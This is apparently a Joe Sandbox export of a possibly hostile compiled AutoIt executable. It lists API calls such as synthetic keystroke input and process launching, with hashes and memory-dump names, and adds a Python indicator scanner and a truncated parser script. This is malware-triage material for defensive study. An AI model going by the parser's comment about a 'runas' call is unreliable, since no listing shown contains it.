                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
• API String ID: 1703294689-0
• Opcode ID: 0cb621565c0fc7cea72a26d14ffe8cf00bea6b915b6644e17f76d638fb0e9375
• Instruction ID: d7e61a0f60e35e136d50f815e37089857063f3339717f4034bfef43d561ef0d6
• Opcode Fuzzy Hash: 0cb621565c0fc7cea72a26d14ffe8cf00bea6b915b6644e17f76d638fb0e9375
• Instruction Fuzzy Hash: E2E0B631000148ABDF11AF54DD09AAA3F69FB85781B104014FD558AA22DB75DE82DA80
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0013B25D
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0013B270
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: d4686b86d752414633f6f49a6697a21c73d6fabe172cbe93a8cffe6263d52944
• Instruction ID: 129cef8c3feb2e3ae9bd81f1b87380e04f136e1b9536584d83f00fcd5e9dfe0f
• Opcode Fuzzy Hash: d4686b86d752414633f6f49a6697a21c73d6fabe172cbe93a8cffe6263d52944
• Instruction Fuzzy Hash: 7AF06D7080428EABDB058FA0C806BBE7BB0FF04309F00800AF961A5192D3B992019F94
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetInputState.USER32 ref: 000DD807
• timeGetTime.WINMM ref: 000DDA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB28
• TranslateMessage.USER32(?), ref: 000DDB7B
• DispatchMessageW.USER32(?), ref: 000DDB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB9F
• Sleep.KERNEL32(0000000A), ref: 000DDBB1
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: 5afd87e745467ff18c6ef15000c131b669729f0e449d2f9dfc5da5d2339c9140
• Instruction ID: 5e6ff793702465c589b656db54e00acf0615554901bb01a725efb9b68b3133df
• Opcode Fuzzy Hash: 5afd87e745467ff18c6ef15000c131b669729f0e449d2f9dfc5da5d2339c9140
• Instruction Fuzzy Hash: 7F42FF30608352EFD728CF24D894BAEBBE1BF46314F14851BE49587791D7B1E894CBA2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 000D2D07
• RegisterClassExW.USER32(00000030), ref: 000D2D31
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000D2D42
• InitCommonControlsEx.COMCTL32(?), ref: 000D2D5F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000D2D6F
• LoadIconW.USER32(000000A9), ref: 000D2D85
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000D2D94
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 0e127a83505104bf8da1056f24c946fd3d29a1577acbc3664542426a32c007ca
• Instruction ID: abac06fb62a7f57f07ded210401c3a14421a152d429f7e5f86b2b632a504aceb
• Opcode Fuzzy Hash: 0e127a83505104bf8da1056f24c946fd3d29a1577acbc3664542426a32c007ca
• Instruction Fuzzy Hash: 0521F2B5901318AFDB00DFA4EC89BEEBBB4FB09714F00811AF951A66A0D7B50584CF91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0011039A: CreateFileW.KERNEL32(00000000,00000000,?,00110704,?,?,00000000,?,00110704,00000000,0000000C), ref: 001103B7
• GetLastError.KERNEL32 ref: 0011076F
• __dosmaperr.LIBCMT ref: 00110776
• GetFileType.KERNEL32(00000000), ref: 00110782
• GetLastError.KERNEL32 ref: 0011078C
• __dosmaperr.LIBCMT ref: 00110795
• CloseHandle.KERNEL32(00000000), ref: 001107B5
• CloseHandle.KERNEL32(?), ref: 001108FF
• GetLastError.KERNEL32 ref: 00110931
• __dosmaperr.LIBCMT ref: 00110938
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: f3e77cfd88acf063c3734e99f63c44376488844d6879195ff95dc16c7be0dfd9
• Instruction ID: 546c6e60a86138a80e3c160cf14540f866ea9f94f4eb865b655e23eb72a86df3
• Opcode Fuzzy Hash: f3e77cfd88acf063c3734e99f63c44376488844d6879195ff95dc16c7be0dfd9
• Instruction Fuzzy Hash: 0DA10832D041098FDF1EAF68DC517ED7BA0AB0A320F140169F855AB3D1D7719D92CB91
Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A1418,?,000D2E7F,?,?,?,00000000), ref: 000D3A78
                                                                                                                                                                                                                                            • Part of subcall function 000D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000D3379
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000D356A
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0011318D
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001131CE
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00113210
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00113277
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00113286
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                          • Opcode ID: 03316041a5ecdfa16faa8b28bcae4a5bc57e239073093efc0fe971b5b2363a52
                                                                                                                                                                                                                                          • Instruction ID: 1c2333fd3435deb484704843300b241782961854f538f8bc06a29241cdeba03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03316041a5ecdfa16faa8b28bcae4a5bc57e239073093efc0fe971b5b2363a52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC71B4715043019EC704EF69DC819ABBBE8FF9B740F40442EF585D36A1EB749A88CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
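The function listed above opens HKCU\Software\AutoIt v3\AutoIt and reads its Include value, and the neighbouring functions register a window class named "AutoIt v3"; these runtime strings are what lets an analyst (and the report's "compiled AutoIt script" signature) classify the sample before unpacking it. The following Python triage scanner is an added example, not code from the Joe Sandbox report or from the AutoIt project. It searches a PE file or memory dump for the two strings the API listing shows, in the UTF-16LE form the W-suffixed registry and window APIs imply, and additionally for the AU3!EA06 script marker and the "third-party compiled AutoIt script" notice; those last two are my own assumptions about compiled-AutoIt layout and do not come from this page. The sample buffer is constructed for the demonstration.

```python
"""Triage scanner for compiled-AutoIt indicators in a PE file or memory dump (added example)."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Strings taken from the sandbox API listing: RegOpenKeyExW on the AutoIt
# registry path and the "AutoIt v3" window class. Stored as UTF-16LE.
WIDE_INDICATORS = {
    "autoit_registry_key": r"Software\AutoIt v3\AutoIt",
    "autoit_window_class": "AutoIt v3",
}

# Assumption (not shown in the report): compiled AutoIt binaries carry an
# embedded script prefixed with the AU3!EA06 token and a third-party notice.
ASCII_INDICATORS = {
    "au3_script_magic": b"AU3!EA06",
    "autoit_third_party_notice": b"This is a third-party compiled AutoIt script.",
}


@dataclass
class Finding:
    name: str
    offset: int
    length: int
    encoding: str

    @property
    def end(self) -> int:
        return self.offset + self.length


def _find_all(blob: bytes, needle: bytes, name: str, encoding: str) -> list[Finding]:
    return [Finding(name, m.start(), len(needle), encoding)
            for m in re.finditer(re.escape(needle), blob)]


def scan_autoit_indicators(blob: bytes) -> list[Finding]:
    """Return every indicator hit, sorted by offset, with nested hits removed."""
    found: list[Finding] = []
    for name, text in WIDE_INDICATORS.items():
        found += _find_all(blob, text.encode("utf-16-le"), name, "utf-16-le")
    for name, needle in ASCII_INDICATORS.items():
        found += _find_all(blob, needle, name, "ascii")
    # "AutoIt v3" also occurs inside the registry path; a short indicator that
    # sits wholly inside a longer one is noise, so drop it.
    kept = [f for f in found
            if not any(o is not f and o.length > f.length
                       and o.offset <= f.offset and f.end <= o.end for o in found)]
    return sorted(kept, key=lambda f: f.offset)


def classify(findings: list[Finding]) -> str:
    """Coarse verdict: embedded script marker beats runtime-only strings."""
    names = {f.name for f in findings}
    if names & {"au3_script_magic", "autoit_third_party_notice"}:
        return "compiled-autoit-script"
    if names & {"autoit_registry_key", "autoit_window_class"}:
        return "autoit-runtime"
    return "no-autoit-indicators"


# Constructed sample: a fake header, the two wide strings from the report,
# and the (assumed) script marker, separated by filler bytes.
SAMPLE = (
    b"MZ" + b"\x00" * 64
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 16
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 16
    + b"AU3!EA06" + b"\x00" * 8
)


if __name__ == "__main__":
    # Usage: python scan.py <file.exe or .sdmp dump>; falls back to SAMPLE.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    hits = scan_autoit_indicators(data)
    for h in hits:
        print(f"0x{h.offset:08x}  {h.name:<28} ({h.encoding})")
    print("verdict:", classify(hits))
```

Run it against the .sdmp dumps listed under Memory Dump Source to confirm the hits land at the same image offsets the report attributes to the AutoIt runtime; a hit on the registry path alone says only that the AutoIt interpreter is present, whereas the script marker says a script is embedded and is worth extracting.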

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 000D2B8E
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 000D2B9D
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 000D2BB3
                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 000D2BC5
                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 000D2BD7
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000D2BEF
                                                                                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 000D2C40
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: GetSysColorBrush.USER32(0000000F), ref: 000D2D07
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: RegisterClassExW.USER32(00000030), ref: 000D2D31
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000D2D42
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 000D2D5F
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000D2D6F
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: LoadIconW.USER32(000000A9), ref: 000D2D85
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000D2D94
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                          • Opcode ID: eb31049b7520bd288ded4991a959e812cdab8e3bbd28c253cd6788dd8058ea9f
                                                                                                                                                                                                                                          • Instruction ID: 4e9aef452e66a41af2b776512016524e8b6af77a7a088efe2479af61edf29295
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb31049b7520bd288ded4991a959e812cdab8e3bbd28c253cd6788dd8058ea9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 942118B4E00328BFDF109FA5EC55AA97FF4FF49B60F00002AE504A6AA0D7B10580CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

• Legend: Executed / Not Executed (rendered graph image not reproduced in this export)
• Entry block d3170; API-calling blocks: d31d0 DefWindowProcW, d3201 KillTimer, d321d SetTimer + RegisterWindowMessageW, d3246 CreatePopupMenu, d3265 PostQuitMessage, 112dc6 SetFocus, 112dd7 MoveWindow
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000D316A,?,?), ref: 000D31D8
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,000D316A,?,?), ref: 000D3204
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000D3227
                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000D316A,?,?), ref: 000D3232
                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 000D3246
                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 000D3267
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                          • Opcode ID: 9fc0626a3da82505e1d3674bc3c1231077023e12efca768a4edc5a28df719583
                                                                                                                                                                                                                                          • Instruction ID: 8ca263a68d4cb41deed44596590318de7d49b7f984c6d197c740a6e86485b4cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc0626a3da82505e1d3674bc3c1231077023e12efca768a4edc5a28df719583
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38412939600306BBDF241F789D19BBE3A5AEB06354F040127F94196BA1CBB19A80D7B3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (rendered as an image in the report; only the block ranges and API calls recoverable from the extracted node/edge dump are kept here)
• Entry block d1410-d1449; blocks span d1410-d171a and 1124b8-112677
• API calls on the graph: mciSendStringW, DestroyWindow, UnregisterHotKey, FindClose, FreeLibrary, VirtualFree, OleUninitialize
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000D1459
                                                                                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 000D14F8
                                                                                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 000D16DD
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001124B9
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0011251E
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0011254B
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                          • Opcode ID: eea6a78690b15c8ec826cc7ad8337fd02390b9fd587726495c48a7f56720e6d8
                                                                                                                                                                                                                                          • Instruction ID: 7e5cb930c1737317525b944d3d0a30c9bb0978ef149a55fabbf2c0bdc284f055
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eea6a78690b15c8ec826cc7ad8337fd02390b9fd587726495c48a7f56720e6d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D13C31701212DFDB29EF15D895AA9F7A5BF05700F1441AEE44A6B362DF30AD62CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (rendered as an image in the report; summarised from the extracted node dump)
• Single basic block d2c63-d2cd3: CreateWindowExW x2, ShowWindow x2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000D2C91
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000D2CB2
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000D1CAD,?), ref: 000D2CC6
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000D1CAD,?), ref: 000D2CCF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                          • Opcode ID: 0c0d56c81b8a477b032730d3cb791bd2cd44c970410e85aca4f9f124681ec026
                                                                                                                                                                                                                                          • Instruction ID: aa5a7415601313feb5df815eb70a73905e610d119024289be44880477eb6eabc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0d56c81b8a477b032730d3cb791bd2cd44c970410e85aca4f9f124681ec026
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0DA765402A07AEF311B27AC08E773EBDEBC7F70F00405AFD00A29A0C6A51890DAB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (rendered as an image in the report; only the block ranges and API calls recoverable from the extracted node/edge dump are kept here)
• Entry block 15ad64-15ad9c; blocks span 15ad64-15af7b
• API calls on the graph: ShellExecuteExW, GetProcessId, CloseHandle
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0015AEA3
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0015AF38
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015AF67
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                          • Opcode ID: 564ed32bbf322cdba0d8af6a169c1b2d8480d0fda2e8752896670294d117953d
                                                                                                                                                                                                                                          • Instruction ID: 0f0e5de05a4f25f9acff48a7f455bfebfdebafca58b66e4afcf49cf5ed49b21c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 564ed32bbf322cdba0d8af6a169c1b2d8480d0fda2e8752896670294d117953d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97717970A00619DFCB14EF54D495A9EBBF0FF08310F44859AE82AAB352DB70ED45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
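The function blocks in this section are useful mostly as a list of call sites; triaging many of them by hand is slow. The script below is an added example for this page, not Joe Sandbox code: it parses the "APIs" bullets and the sdmp memory-dump names exactly as they are printed here (constructed sample text taken from the bullets on this page), groups calls per function, and flags three things relevant to an AutoIt sample: the CreateWindowExW call that creates the "AutoIt v3" window, a ShellExecute* call in a function where the "runas" verb (an elevation prompt) is visible on the stack, and zero-parameter APIs such as GetForegroundWindow and OleUninitialize for which the report prints "arguments". Those arguments are the stack slots at the call site, not real parameters; the "runas" shown under GetForegroundWindow is the lpOperation being set up for the ShellExecuteW that follows it. The sdmp field layout (process index, phase, dump id, base, page protection, state, memory type, module index) is an assumption inferred from the values on this page; the Win32 parameter counts and the PAGE_*/MEM_* constants are standard Windows values.

```python
"""Parse the per-function 'APIs' listings and sdmp names of a Joe Sandbox function
export page and triage them for an AutoIt sample.

Added example, not Joe Sandbox code. SAMPLE is constructed from bullets on this page.
The sdmp field layout is an assumption inferred from the page's values; the Win32
parameter counts and PAGE_*/MEM_* constants are standard Windows facts.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<subaddr>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SDMP_RE = re.compile(  # assumed layout: proc.phase.dumpid.base.protect.state.type.module
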